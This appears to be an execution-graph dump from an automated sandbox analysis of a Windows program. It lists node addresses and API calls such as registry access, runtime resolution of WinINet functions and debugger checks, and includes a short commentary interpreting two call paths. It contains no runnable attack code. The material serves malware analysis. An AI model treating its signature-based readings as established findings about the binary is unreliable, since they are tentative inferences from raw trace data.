83323->83325 83324->83320 83327 1110e53a 83325->83327 83328 11059580 79 API calls 83325->83328 83326->83325 83329 1110e546 83327->83329 83330 1110e56a SystemParametersInfoA 83327->83330 83331 1110e579 83327->83331 83328->83327 83329->83331 83333 1110e555 SystemParametersInfoA 83329->83333 83330->83331 83332 1110e598 83331->83332 83334 11059580 79 API calls 83331->83334 83335 1110e5a4 83332->83335 83336 1110e5c8 SystemParametersInfoA 83332->83336 83337 1110e5d7 83332->83337 83333->83331 83334->83332 83335->83337 83338 1110e5b3 SystemParametersInfoA 83335->83338 83336->83337 83339 1110e5f6 83337->83339 83342 11059580 79 API calls 83337->83342 83338->83337 83340 1110e602 83339->83340 
83341 1110e626 SystemParametersInfoA 83339->83341 83343 1110e635 83339->83343 83340->83343 83344 1110e611 SystemParametersInfoA 83340->83344 83341->83343 83342->83339 83345 1110e654 83343->83345 83346 11059580 79 API calls 83343->83346 83344->83343 83347 1110e660 83345->83347 83348 1110e684 SystemParametersInfoA 83345->83348 83349 1110e693 83345->83349 83346->83345 83347->83349 83350 1110e66f SystemParametersInfoA 83347->83350 83348->83349 83351 1110e6b2 83349->83351 83352 11059580 79 API calls 83349->83352 83350->83349 83353 1110e6e2 SystemParametersInfoA 83351->83353 83354 1110e6be 83351->83354 83355 1110e6f1 83351->83355 83352->83351 83353->83355 83354->83355 83356 1110e6cd SystemParametersInfoA 83354->83356 83357 1110e710 83355->83357 83360 11059580 79 API calls 83355->83360 83356->83355 83358 1110e740 SystemParametersInfoA 83357->83358 83359 1110e71c 83357->83359 83361 1110e74f 83357->83361 83358->83361 83359->83361 83362 1110e72b SystemParametersInfoA 83359->83362 83360->83357 83363 1110e76e 83361->83363 83364 11059580 79 API calls 83361->83364 83362->83361 83365 1110e7a5 83363->83365 83366 1110e77a 83363->83366 83368 1110e79c 83363->83368 83364->83363 83476 11109520 83365->83476 83366->83368 83369 11109520 4 API calls 83366->83369 83370 1110e7da 83368->83370 83371 11059580 79 API calls 83368->83371 83369->83368 83372 1110e7e6 83370->83372 83373 1110e80a SystemParametersInfoA 83370->83373 83374 1110e819 83370->83374 83371->83370 83372->83374 83376 1110e7f5 SystemParametersInfoA 83372->83376 83373->83374 83375 1110e838 83374->83375 83377 11059580 79 API calls 83374->83377 83378 1110e844 83375->83378 83379 1110e865 SystemParametersInfoA 83375->83379 83380 1110e871 83375->83380 83376->83374 83377->83375 83378->83380 83381 1110e853 SystemParametersInfoA 83378->83381 83379->83380 83382 1110e890 83380->83382 83385 11059580 79 API calls 83380->83385 83381->83380 83383 1110e8c3 83382->83383 83384 1110e89c 83382->83384 83387 1110e8ba 83382->83387 83487 111095d0 
Execution Graph (graph residue)

[The node/edge listing of the rendered execution graph is not reproduced here. Only the Windows API names that survive in this portion of the graph are kept below, grouped by what the surrounding nodes do.]

Registry: RegOpenKeyExA, RegQueryValueExA, RegSetValueExA, RegCreateKeyExA, RegCloseKey
Environment and file system: GetVersionExA, GetModuleFileNameA, ExpandEnvironmentStringsA, SHGetFolderPathA, GetFileAttributesA, CreateDirectoryA, CreateFileA, CloseHandle
Dynamic API resolution and networking: LoadLibraryA, GetProcAddress, SetLastError, GetLastError, FreeLibrary, InternetOpenA, InternetConnectA
Debugging and fault handling: OutputDebugStringA, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Threads, synchronisation and desktops: GetCurrentThreadId, WaitForSingleObject, WaitForMultipleObjects, CreateEventA, SetEvent, PulseEvent, PostMessageA, PostThreadMessageA, Sleep, GetTickCount, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, UnhookWindowsHookEx, GetThreadDesktop, OpenDesktopA, SetThreadDesktop, CloseDesktop
Windows and processes: FindWindowA, GetWindowThreadProcessId, OpenProcess, SendMessageA, GetDesktopWindow, IsWindow, IsWindowVisible, IsIconic, GetForegroundWindow, SetForegroundWindow, EnableWindow, ShowWindow, SetWindowTextA, SetDlgItemTextA, RegisterClassA, CreateWindowExA, GetStockObject, GlobalAddAtomA, GetSystemMetrics, GetProcessHandleCount, K32GetProcessMemoryInfo
String handling: MultiByteToWideChar, WideCharToMultiByte, wsprintfA, wvsprintfA, IsDBCSLeadByte

Two call sequences in this portion are worth reading in context rather than as isolated API hits:

The WinINet path is reached through LoadLibraryA followed by a run of GetProcAddress/SetLastError pairs before InternetOpenA and InternetConnectA are called, i.e. the networking imports are resolved at run time rather than through the import table. This is the concrete evidence behind the "Contains functionality to dynamically determine API calls" signature.

The IsDebuggerPresent hit sits on a node together with SetUnhandledExceptionFilter and UnhandledExceptionFilter, is reached via __call_reportfault, and ends in GetCurrentProcess/TerminateProcess. That is the MSVC CRT fatal-error (invalid parameter) reporting path, so this particular IsDebuggerPresent call should not by itself be read as a deliberate anti-debugging check; the OutputDebugStringA/GetLastError pairing elsewhere in the graph is the stronger candidate for that.
87710->87706 87713 11131451 87714 1105c810 274 API calls 87713->87714 87717 11131466 87714->87717 87715 11131403 87715->87708 87777 1104c600 365 API calls 4 library calls 87715->87777 87778 11063210 300 API calls std::locale::facet::_Facet_Register 87715->87778 87716 11131331 87718 1105c030 268 API calls 87716->87718 87719 1113147a LeaveCriticalSection 87717->87719 87780 110293b0 283 API calls 2 library calls 87717->87780 87720 11123050 86 API calls 87720->87732 87721 111356e0 std::locale::facet::_Facet_Register 21 API calls 87721->87726 87726->87716 87726->87721 87733 1105c0c0 274 API calls 87726->87733 87731 1107c4f0 86 API calls 87731->87732 87732->87684 87732->87685 87732->87690 87732->87696 87732->87720 87732->87731 87740 1107c5a0 86 API calls std::locale::facet::_Facet_Register 87732->87740 87733->87726 87740->87732 87776->87715 87777->87715 87778->87715 87779->87713 87786 1111e13c 87785->87786 87787 1111e177 87786->87787 87789 1111e164 87786->87789 87809 11066c70 300 API calls 87787->87809 87790 11135ee0 269 API calls 87789->87790 87791 1111e16f 87790->87791 87792 1111e1c3 87791->87792 87793 11131740 std::locale::facet::_Facet_Register 265 API calls 87791->87793 87792->87579 87792->87581 87793->87792 87794->87559 87795->87564 87796->87570 87797->87576 87798->87586 87799->87585 87800->87597 87801->87603 87802->87613 87803->87601 87804->87620 87805->87594 87806->87602 87807->87600 87808->87616 87809->87791 87810 11133650 87811 11133661 87810->87811 87824 11133070 87811->87824 87815 111336e5 87818 11133702 87815->87818 87820 111336e4 87815->87820 87816 111336ab 87817 111336b2 ResetEvent 87816->87817 87832 11133230 265 API calls 2 library calls 87817->87832 87820->87815 87833 11133230 265 API calls 2 library calls 87820->87833 87821 111336c6 SetEvent WaitForMultipleObjects 87821->87817 87821->87820 87823 111336ff 87823->87818 87825 1113307c GetCurrentProcess 87824->87825 87828 1113309f 87824->87828 87826 1113308d GetModuleFileNameA 87825->87826 87825->87828 
87826->87828 87827 111330c9 WaitForMultipleObjects 87827->87815 87827->87816 87828->87827 87829 11102870 std::locale::facet::_Facet_Register 263 API calls 87828->87829 87830 111330bb 87829->87830 87830->87827 87834 111329c0 GetModuleFileNameA 87830->87834 87832->87821 87833->87823 87835 11132a43 87834->87835 87836 11132a03 87834->87836 87839 11132a69 GetModuleHandleA GetProcAddress 87835->87839 87840 11132a4f LoadLibraryA 87835->87840 87837 1107c480 std::locale::facet::_Facet_Register IsDBCSLeadByte 87836->87837 87838 11132a11 87837->87838 87838->87835 87841 11132a18 LoadLibraryA 87838->87841 87843 11132a97 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 87839->87843 87844 11132a89 87839->87844 87840->87839 87842 11132a5e LoadLibraryA 87840->87842 87841->87835 87842->87839 87845 11132ac3 10 API calls 87843->87845 87844->87845 87846 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 87845->87846 87847 11132b40 87846->87847 87847->87827 87848 1102ed27 87849 1102ed3a 87848->87849 87850 1102f3a0 87849->87850 87851 1102ed5e RegOpenKeyExA 87849->87851 87857 1102ee13 87849->87857 87852 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 87850->87852 87853 1102ed86 87851->87853 87851->87857 87855 1102f512 87852->87855 87856 11132450 std::locale::facet::_Facet_Register RegQueryValueExA 87853->87856 87854 1102ef17 87859 11102870 std::locale::facet::_Facet_Register 265 API calls 87854->87859 87860 1102edae 87856->87860 87863 1102ee89 GetModuleHandleA GetProcAddress 87857->87863 87872 1102ee37 87857->87872 87877 1102eeb3 87857->87877 87858 11102870 std::locale::facet::_Facet_Register 265 API calls 87861 1102ee59 87858->87861 87862 1102ef1e 87859->87862 87864 1102ee06 RegCloseKey 87860->87864 87866 11151867 std::locale::facet::_Facet_Register 79 API calls 87860->87866 87936 110fc270 87861->87936 87875 1102ee75 GetStockObject GetObjectA 87862->87875 
88038 110eeb50 272 API calls std::locale::facet::_Facet_Register 87862->88038 87865 1102eea6 GetNativeSystemInfo 87863->87865 87863->87877 87864->87857 87865->87877 87869 1102edbe 87866->87869 88036 11152c8a 79 API calls __isdigit_l 87869->88036 87871 1102f0a7 SetErrorMode SetErrorMode 87879 11102870 std::locale::facet::_Facet_Register 265 API calls 87871->87879 87872->87858 87872->87875 87875->87871 87876 1102edcd 87878 1102ede6 87876->87878 88037 11152c8a 79 API calls __isdigit_l 87876->88037 87877->87854 87877->87872 87882 11151867 std::locale::facet::_Facet_Register 79 API calls 87878->87882 87881 1102f0e3 87879->87881 87985 11026ed0 87881->87985 87884 1102edf2 87882->87884 87884->87864 87885 1102f0fd 87886 11102870 std::locale::facet::_Facet_Register 265 API calls 87885->87886 87887 1102f123 87886->87887 87888 11026ed0 268 API calls 87887->87888 87889 1102f13d InterlockedExchange 87888->87889 87891 11102870 std::locale::facet::_Facet_Register 265 API calls 87889->87891 87892 1102f165 87891->87892 87988 11084cb0 87892->87988 87894 1102f17d GetACP 87999 11151b53 87894->87999 87898 11153e83 _setlocale 101 API calls 87899 1102f1ae 87898->87899 87900 11132000 86 API calls 87899->87900 87901 1102f1d4 87900->87901 87902 11102870 std::locale::facet::_Facet_Register 265 API calls 87901->87902 87903 1102f1f4 87902->87903 87904 1105c840 301 API calls 87903->87904 87906 1102f21f 87904->87906 87905 1102f26c 87907 11102870 std::locale::facet::_Facet_Register 265 API calls 87905->87907 87906->87905 87908 11102870 std::locale::facet::_Facet_Register 265 API calls 87906->87908 87909 1102f294 87907->87909 87910 1102f246 87908->87910 88010 11116a20 87909->88010 87910->87905 87912 1105c4b0 293 API calls 87910->87912 87912->87905 87937 11102870 std::locale::facet::_Facet_Register 265 API calls 87936->87937 87938 110fc2d1 87937->87938 87939 110fc2e9 OpenEventA 87938->87939 88045 110fa7d0 87938->88045 87942 110fc358 CloseHandle GetSystemDirectoryA 87939->87942 87943 110fc411 
GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 87939->87943 87945 110fc378 87942->87945 87944 11102870 std::locale::facet::_Facet_Register 265 API calls 87943->87944 87946 110fc463 87944->87946 87945->87945 87947 110fc380 LoadLibraryA 87945->87947 87948 110fc47c 87946->87948 88064 110e9520 268 API calls std::locale::facet::_Facet_Register 87946->88064 87947->87943 87949 110fc3b1 87947->87949 87952 11102700 423 API calls 87948->87952 87951 11134460 std::locale::facet::_Facet_Register 90 API calls 87949->87951 87953 110fc3bb 87951->87953 87954 110fc498 CloseHandle 87952->87954 87955 110fc3da GetProcAddress 87953->87955 87956 110fc3c2 GetProcAddress 87953->87956 87957 11096d20 12 API calls 87954->87957 87958 110fc3f6 87955->87958 87959 110fc404 FreeLibrary 87955->87959 87956->87955 87960 110fc4a4 87957->87960 87958->87943 87959->87943 87961 110fc58d 87960->87961 87963 11102870 std::locale::facet::_Facet_Register 265 API calls 87960->87963 87962 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 87961->87962 87964 110fc5a7 87962->87964 87965 110fc4b3 87963->87965 87964->87875 87966 110fc4cd 87965->87966 87967 110fc4c4 87965->87967 87969 11102700 423 API calls 87966->87969 88065 110e9520 268 API calls std::locale::facet::_Facet_Register 87967->88065 87970 110fc4e9 CloseHandle 87969->87970 87971 11134460 std::locale::facet::_Facet_Register 90 API calls 87970->87971 87972 110fc4fa 87971->87972 87972->87961 87973 11102870 std::locale::facet::_Facet_Register 265 API calls 87972->87973 87974 110fc50c 87973->87974 87975 110fc526 87974->87975 88066 110e9520 268 API calls std::locale::facet::_Facet_Register 87974->88066 87977 11102700 423 API calls 87975->87977 87978 110fc542 CloseHandle 87977->87978 87979 11102870 std::locale::facet::_Facet_Register 265 API calls 87978->87979 87980 110fc550 87979->87980 87981 110fc56a 87980->87981 88067 110e9520 268 API calls 
std::locale::facet::_Facet_Register 87980->88067 87983 11102700 423 API calls 87981->87983 87984 110fc586 CloseHandle 87983->87984 87984->87961 87986 11083130 268 API calls 87985->87986 87987 11026edb _memset 87986->87987 87987->87885 87989 11102870 std::locale::facet::_Facet_Register 265 API calls 87988->87989 87990 11084ce7 87989->87990 87991 11102870 std::locale::facet::_Facet_Register 265 API calls 87990->87991 87995 11084d09 InitializeCriticalSection 87990->87995 87993 11084d02 87991->87993 87993->87995 88070 11150c1a 66 API calls std::exception::_Copy_str 87993->88070 87994 11084d6a 87994->87894 87995->87994 87997 11084d39 88071 11151071 RaiseException 87997->88071 88000 11151b86 87999->88000 88001 11151b71 87999->88001 88000->88001 88002 11151b8d 88000->88002 88072 11157ccf 66 API calls __getptd_noexit 88001->88072 88074 1115dd9b 102 API calls 11 library calls 88002->88074 88004 11151b76 88073 1115c8e4 11 API calls __close 88004->88073 88007 11151bb3 88008 1102f1a4 88007->88008 88075 1115dc04 97 API calls 6 library calls 88007->88075 88008->87898 88011 11102870 std::locale::facet::_Facet_Register 265 API calls 88010->88011 88012 11116a54 88011->88012 88013 11116a85 88012->88013 88014 11116a6a 88012->88014 88076 11115e30 88013->88076 88122 11070e20 460 API calls std::locale::facet::_Facet_Register 88014->88122 88016 11116a7a 88016->88013 88036->87876 88037->87876 88038->87875 88046 11102970 3 API calls 88045->88046 88047 110fa80c 88046->88047 88048 11102970 3 API calls 88047->88048 88049 110fa81c 88048->88049 88050 11102970 3 API calls 88049->88050 88051 110fa82e 88050->88051 88052 11102970 3 API calls 88051->88052 88053 110fa83f 88052->88053 88054 11102970 3 API calls 88053->88054 88055 110fa850 88054->88055 88056 11102870 std::locale::facet::_Facet_Register 265 API calls 88055->88056 88057 110fa861 88056->88057 88058 110fa86c LoadLibraryA LoadLibraryA 88057->88058 88059 110fa944 88057->88059 88058->87939 88068 11150c1a 66 API calls std::exception::_Copy_str 
88059->88068 88061 110fa953 88069 11151071 RaiseException 88061->88069 88063 110fa968 88064->87948 88065->87966 88066->87975 88067->87981 88068->88061 88069->88063 88070->87997 88071->87995 88072->88004 88073->88008 88074->88007 88075->88008 88077 11115e91 InitializeCriticalSection 88076->88077 88079 11115ebe GetCurrentThreadId 88077->88079 88081 11115ef5 88079->88081 88082 11115efc 88079->88082 88156 111026b0 InterlockedIncrement 88081->88156 88124 1114e6e0 InterlockedIncrement 88082->88124 88085 11115f11 88086 11059580 79 API calls 88085->88086 88087 11115f49 88086->88087 88088 11102870 std::locale::facet::_Facet_Register 265 API calls 88087->88088 88094 11115f91 88087->88094 88090 11115f72 88088->88090 88089 11102870 std::locale::facet::_Facet_Register 265 API calls 88091 11115fb9 88089->88091 88092 111035c0 423 API calls 88090->88092 88090->88094 88095 11115fe3 88091->88095 88157 1100d190 439 API calls 88091->88157 88092->88094 88094->88089 88122->88016 88125 1114e6f7 88124->88125 88126 1114e6f2 88124->88126 88128 1114e71c SelectPalette SelectPalette 88125->88128 88129 1114e708 88125->88129 88161 1114e630 271 API calls std::locale::facet::_Facet_Register 88126->88161 88163 1114e320 265 API calls 88128->88163 88162 11027fb0 265 API calls 2 library calls 88129->88162 88133 1114e743 88164 1114e320 265 API calls 88133->88164 88135 1114e750 88136 1114e763 88135->88136 88137 1114e81e 88135->88137 88165 1114e2b0 265 API calls 2 library calls 88136->88165 88170 1114e320 265 API calls 88137->88170 88140 1114e82b 88142 1114e831 DeleteDC 88140->88142 88141 1114e76e 88143 1114e793 88141->88143 88144 1114e77d GetSystemPaletteEntries 88141->88144 88142->88085 88145 1114e7b6 88143->88145 88146 1114e79f 88143->88146 88144->88145 88167 1114e2b0 265 API calls 2 library calls 88145->88167 88166 11027fb0 265 API calls 2 library calls 88146->88166 88150 1114e7c2 _memmove 88168 11151c2b 66 API calls 2 library calls 88150->88168 88152 1114e7f1 88152->88142 88153 1114e7fb 88152->88153 
88169 11027fb0 265 API calls 2 library calls 88153->88169 88156->88082 88157->88095 88161->88125 88163->88133 88164->88135 88165->88141 88167->88150 88168->88152 88170->88140 88172 11084280 88173 11102bc0 ___DllMainCRTStartup 4 API calls 88172->88173 88174 11084293 88173->88174 88175 1108429d 88174->88175 88184 11083a30 268 API calls std::locale::facet::_Facet_Register 88174->88184 88177 110842c4 88175->88177 88185 11083a30 268 API calls std::locale::facet::_Facet_Register 88175->88185 88180 110842d3 88177->88180 88181 11084250 88177->88181 88186 11083f80 88181->88186 88183 11084270 88183->88180 88184->88175 88185->88177 88219 11083240 6 API calls ___DllMainCRTStartup 88186->88219 88188 11083faf GetParent 88189 11083fca 88188->88189 88190 11083fbf 88188->88190 88192 11134180 267 API calls 88189->88192 88191 11083fc0 GetParent 88190->88191 88191->88189 88191->88191 88193 11083fd6 88192->88193 88194 111524d7 std::locale::facet::_Facet_Register 143 API calls 88193->88194 88195 11083fe3 std::ios_base::_Tidy 88194->88195 88196 11134180 267 API calls 88195->88196 88197 11083ff8 88196->88197 88198 111522a1 std::locale::facet::_Facet_Register 102 API calls 88197->88198 88199 1108400b std::locale::facet::_Facet_Register 88197->88199 88198->88199 88200 11028fe0 std::locale::facet::_Facet_Register 145 API calls 88199->88200 88210 1108402d std::ios_base::_Tidy 88199->88210 88201 1108405d 88200->88201 88202 11131740 std::locale::facet::_Facet_Register 265 API calls 88201->88202 88203 11084068 88202->88203 88204 1107c480 std::locale::facet::_Facet_Register IsDBCSLeadByte 88203->88204 88205 1108407c 88204->88205 88206 1107c4f0 86 API calls 88205->88206 88205->88210 88207 11084095 88206->88207 88208 1108409c 88207->88208 88209 110840dd 88207->88209 88220 110ae0c0 88208->88220 88212 1107c4f0 86 API calls 88209->88212 88210->88183 88214 110840eb 88212->88214 88214->88210 88215 110ae0c0 68 API calls 88214->88215 88217 110840f8 88215->88217 88216 110ae0c0 68 API calls 88216->88210 
88217->88210 88218 110ae0c0 68 API calls 88217->88218 88218->88210 88219->88188 88223 110ae0a0 88220->88223 88226 11155cc3 88223->88226 88229 11155c44 88226->88229 88230 11155c51 88229->88230 88231 11155c6b 88229->88231 88247 11157ce2 66 API calls __getptd_noexit 88230->88247 88231->88230 88233 11155c74 GetFileAttributesA 88231->88233 88235 11155c82 GetLastError 88233->88235 88236 11155c98 88233->88236 88234 11155c56 88248 11157ccf 66 API calls __getptd_noexit 88234->88248 88250 11157cf5 66 API calls 2 library calls 88235->88250 88243 110840a2 88236->88243 88252 11157ce2 66 API calls __getptd_noexit 88236->88252 88239 11155c5d 88249 1115c8e4 11 API calls __close 88239->88249 88241 11155c8e 88251 11157ccf 66 API calls __getptd_noexit 88241->88251 88243->88210 88243->88216 88245 11155cab 88253 11157ccf 66 API calls __getptd_noexit 88245->88253 88247->88234 88248->88239 88249->88243 88250->88241 88251->88243 88252->88245 88253->88241 88254 6c823def HeapCreate 88255 1102e710 GetWindowRect 88256 1102e987 88255->88256 88257 1102e784 88255->88257 88258 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 88256->88258 88257->88256 88259 1102e78c GetWindowLongA 88257->88259 88260 1102e9a4 88258->88260 88259->88256 88261 1102e7a6 GetClassNameA 88259->88261 88262 1102e7c0 88261->88262 88262->88256 88263 1102e7ed GetWindowThreadProcessId OpenProcess 88262->88263 88263->88256 88264 1102e819 88263->88264 88283 11024b20 LoadLibraryA 88264->88283 88266 1102e824 88284 11024b50 88266->88284 88268 1102e843 88269 1102e96f CloseHandle 88268->88269 88271 110c57c0 265 API calls 88268->88271 88269->88256 88270 1102e980 FreeLibrary 88269->88270 88270->88256 88272 1102e85d 88271->88272 88294 110c5320 86 API calls std::locale::facet::_Facet_Register 88272->88294 88274 1102e871 88275 1102e960 88274->88275 88276 1102e879 88274->88276 88296 110c5870 265 API calls 2 library calls 88275->88296 88278 1107c480 
std::locale::facet::_Facet_Register IsDBCSLeadByte 88276->88278 88279 1102e88c 88278->88279 88280 111356e0 std::locale::facet::_Facet_Register 21 API calls 88279->88280 88281 1102e8b0 88280->88281 88295 1104bd60 266 API calls 3 library calls 88281->88295 88283->88266 88285 11024b5e GetProcAddress 88284->88285 88286 11024b6f 88284->88286 88285->88286 88287 11024b88 88286->88287 88288 11024b7c K32GetProcessImageFileNameA 88286->88288 88289 11024b8e GetProcAddress 88287->88289 88290 11024b9f 88287->88290 88288->88287 88291 11024bc1 88288->88291 88289->88290 88292 11024ba6 88290->88292 88293 11024bb7 SetLastError 88290->88293 88291->88268 88292->88268 88293->88291 88294->88274 88295->88275 88296->88269 88297 6c823856 88298 6c823861 88297->88298 88299 6c823866 88297->88299 88311 6c82cffd GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 88298->88311 88303 6c823760 88299->88303 88302 6c823874 88304 6c82376c 88303->88304 88305 6c8237c4 ___DllMainCRTStartup 88304->88305 88306 6c8237b1 __CRT_INIT 88304->88306 88307 6c82380d 88304->88307 88309 6c8237f2 88305->88309 88310 6c8237e0 __CRT_INIT 88305->88310 88306->88305 88306->88307 88307->88302 88308 6c823801 __CRT_INIT 88308->88307 88309->88307 88309->88308 88310->88309 88311->88299 88312 111580ed 88313 111580fd 88312->88313 88314 111580f8 88312->88314 88318 11157ff7 88313->88318 88330 11165877 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 88314->88330 88317 1115810b 88319 11158003 __close 88318->88319 88323 11158050 88319->88323 88329 111580a0 __close 88319->88329 88331 11157e93 88319->88331 88322 11158063 88324 11158080 88322->88324 88326 11024c70 ___DllMainCRTStartup 7 API calls 88322->88326 88323->88329 88381 11024c70 88323->88381 88325 11157e93 __CRT_INIT@12 149 API calls 88324->88325 88324->88329 88325->88329 88327 11158077 88326->88327 88328 11157e93 __CRT_INIT@12 149 API calls 88327->88328 88328->88324 88329->88317 
88330->88313 88332 11157e9f __close 88331->88332 88333 11157ea7 88332->88333 88334 11157f21 88332->88334 88390 1115beb0 HeapCreate 88333->88390 88336 11157f27 88334->88336 88337 11157f82 88334->88337 88342 11157f45 88336->88342 88352 11157eb0 __close 88336->88352 88478 1115c17b 66 API calls _doexit 88336->88478 88338 11157f87 88337->88338 88339 11157fe0 88337->88339 88341 11159fda ___set_flsgetvalue 3 API calls 88338->88341 88339->88352 88484 1115a2de 79 API calls __freefls@4 88339->88484 88340 11157eac 88340->88352 88391 1115a34c GetModuleHandleW 88340->88391 88345 11157f8c 88341->88345 88343 11157f59 88342->88343 88479 1115fb4e 67 API calls _free 88342->88479 88482 11157f6c 70 API calls __mtterm 88343->88482 88350 1115879e __calloc_crt 66 API calls 88345->88350 88354 11157f98 88350->88354 88351 11157ebc __RTC_Initialize 88359 11157ecc GetCommandLineA 88351->88359 88374 11157ec0 88351->88374 88352->88323 88353 11157f4f 88480 1115a02b 70 API calls _free 88353->88480 88354->88352 88357 11157fa4 DecodePointer 88354->88357 88360 11157fb9 88357->88360 88358 11157f54 88481 1115bece HeapDestroy 88358->88481 88416 11165794 GetEnvironmentStringsW 88359->88416 88363 11157fd4 88360->88363 88364 11157fbd 88360->88364 88367 11151665 _free 66 API calls 88363->88367 88483 1115a068 66 API calls 4 library calls 88364->88483 88367->88352 88369 11157fc4 GetCurrentThreadId 88369->88352 88371 11157eea 88476 1115a02b 70 API calls _free 88371->88476 88475 1115bece HeapDestroy 88374->88475 88376 11157f0a 88376->88352 88477 1115fb4e 67 API calls _free 88376->88477 88382 11102cd0 88381->88382 88383 11102d04 ___DllMainCRTStartup 88382->88383 88384 11102cf1 88382->88384 88385 11102cdc 88382->88385 88383->88322 88501 11102c20 88384->88501 88385->88383 88388 11102c20 ___DllMainCRTStartup 7 API calls 88385->88388 88387 11102cf8 88387->88322 88389 11102ce5 88388->88389 88389->88322 88390->88340 88392 1115a360 88391->88392 88393 1115a369 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 
88391->88393 88485 1115a02b 70 API calls _free 88392->88485 88399 1115a3b3 TlsAlloc 88393->88399 88396 1115a365 88396->88351 88397 1115a401 TlsSetValue 88398 1115a4c2 88397->88398 88400 1115a412 88397->88400 88398->88351 88399->88397 88399->88398 88486 1115bf37 EncodePointer EncodePointer __init_pointers _raise __initp_misc_winsig 88400->88486 88402 1115a417 EncodePointer EncodePointer EncodePointer EncodePointer 88487 11161d6c InitializeCriticalSectionAndSpinCount 88402->88487 88404 1115a456 88405 1115a4bd 88404->88405 88406 1115a45a DecodePointer 88404->88406 88489 1115a02b 70 API calls _free 88405->88489 88408 1115a46f 88406->88408 88408->88405 88409 1115879e __calloc_crt 66 API calls 88408->88409 88410 1115a485 88409->88410 88410->88405 88411 1115a48d DecodePointer 88410->88411 88412 1115a49e 88411->88412 88412->88405 88413 1115a4a2 88412->88413 88488 1115a068 66 API calls 4 library calls 88413->88488 88415 1115a4aa GetCurrentThreadId 88415->88398 88417 111657b0 WideCharToMultiByte 88416->88417 88422 11157edc 88416->88422 88419 111657e5 88417->88419 88420 1116581d FreeEnvironmentStringsW 88417->88420 88421 11158759 __malloc_crt 66 API calls 88419->88421 88420->88422 88423 111657eb 88421->88423 88429 1115f909 GetStartupInfoW 88422->88429 88423->88420 88424 111657f3 WideCharToMultiByte 88423->88424 88425 11165805 88424->88425 88426 11165811 FreeEnvironmentStringsW 88424->88426 88427 11151665 _free 66 API calls 88425->88427 88426->88422 88428 1116580d 88427->88428 88428->88426 88430 1115879e __calloc_crt 66 API calls 88429->88430 88432 1115f927 88430->88432 88431 11157ee6 88431->88371 88442 111656d9 88431->88442 88432->88431 88434 1115fa9c 88432->88434 88435 1115879e __calloc_crt 66 API calls 88432->88435 88441 1115fa1c 88432->88441 88433 1115fad2 GetStdHandle 88433->88434 88434->88433 88436 1115fb36 SetHandleCount 88434->88436 88437 1115fae4 GetFileType 88434->88437 88440 1115fb0a InitializeCriticalSectionAndSpinCount 88434->88440 88435->88432 88436->88431 
88437->88434 88438 1115fa53 InitializeCriticalSectionAndSpinCount 88438->88431 88438->88441 88439 1115fa48 GetFileType 88439->88438 88439->88441 88440->88431 88440->88434 88441->88434 88441->88438 88441->88439 88443 111656f3 GetModuleFileNameA 88442->88443 88444 111656ee 88442->88444 88446 1116571a 88443->88446 88496 1115f565 94 API calls __setmbcp 88444->88496 88490 1116553f 88446->88490 88449 11158759 __malloc_crt 66 API calls 88450 1116575c 88449->88450 88451 1116553f _parse_cmdline 76 API calls 88450->88451 88452 11157ef6 88450->88452 88451->88452 88452->88376 88453 11165463 88452->88453 88454 1116546c 88453->88454 88456 11165471 _strlen 88453->88456 88498 1115f565 94 API calls __setmbcp 88454->88498 88457 1115879e __calloc_crt 66 API calls 88456->88457 88461 11157eff 88456->88461 88458 111654a6 _strlen 88457->88458 88459 111654f5 88458->88459 88458->88461 88462 1115879e __calloc_crt 66 API calls 88458->88462 88463 1116551b 88458->88463 88465 1115a87f _strcpy_s 66 API calls 88458->88465 88466 11165532 88458->88466 88460 11151665 _free 66 API calls 88459->88460 88460->88461 88461->88376 88469 1115bf8e 88461->88469 88462->88458 88464 11151665 _free 66 API calls 88463->88464 88464->88461 88465->88458 88467 1115c892 __invoke_watson 10 API calls 88466->88467 88468 1116553e 88467->88468 88470 1115bf9c __IsNonwritableInCurrentImage 88469->88470 88499 1115b3ab EncodePointer 88470->88499 88472 1115bfba __initterm_e 88474 1115bfdb __IsNonwritableInCurrentImage 88472->88474 88500 11151995 76 API calls __cinit 88472->88500 88474->88376 88475->88352 88476->88374 88477->88371 88478->88342 88479->88353 88480->88358 88481->88343 88482->88352 88483->88369 88484->88352 88485->88396 88486->88402 88487->88404 88488->88415 88489->88398 88491 1116555e 88490->88491 88494 111655cb 88491->88494 88497 11164ed0 76 API calls x_ismbbtype_l 88491->88497 88493 111656c9 88493->88449 88493->88452 88494->88493 88495 11164ed0 76 API calls _parse_cmdline 88494->88495 88495->88494 88496->88443 
88497->88491 88498->88456 88499->88472 88500->88474 88502 11102c64 EnterCriticalSection 88501->88502 88503 11102c4f InitializeCriticalSection 88501->88503 88504 11102c85 88502->88504 88503->88502 88505 11102cb3 LeaveCriticalSection 88504->88505 88506 11102bc0 ___DllMainCRTStartup 4 API calls 88504->88506 88505->88387 88506->88504 88507 1102ea18 88508 11131ea0 267 API calls 88507->88508 88509 1102ea26 88508->88509 88510 11132000 86 API calls 88509->88510 88511 1102ea5a 88510->88511 88512 1102ea6f 88511->88512 88513 1107c4f0 86 API calls 88511->88513 88514 110e2140 8 API calls 88512->88514 88513->88512 88515 1102ea96 88514->88515 88516 1102eadd 88515->88516 88556 110e21f0 81 API calls 2 library calls 88515->88556 88520 11132000 86 API calls 88516->88520 88518 1102eaab 88557 110e21f0 81 API calls 2 library calls 88518->88557 88522 1102eaf2 88520->88522 88521 1102eac1 88521->88516 88523 11135660 19 API calls 88521->88523 88524 11102870 std::locale::facet::_Facet_Register 265 API calls 88522->88524 88523->88516 88525 1102eb01 88524->88525 88526 1102eb22 88525->88526 88527 11083130 268 API calls 88525->88527 88528 11084cb0 267 API 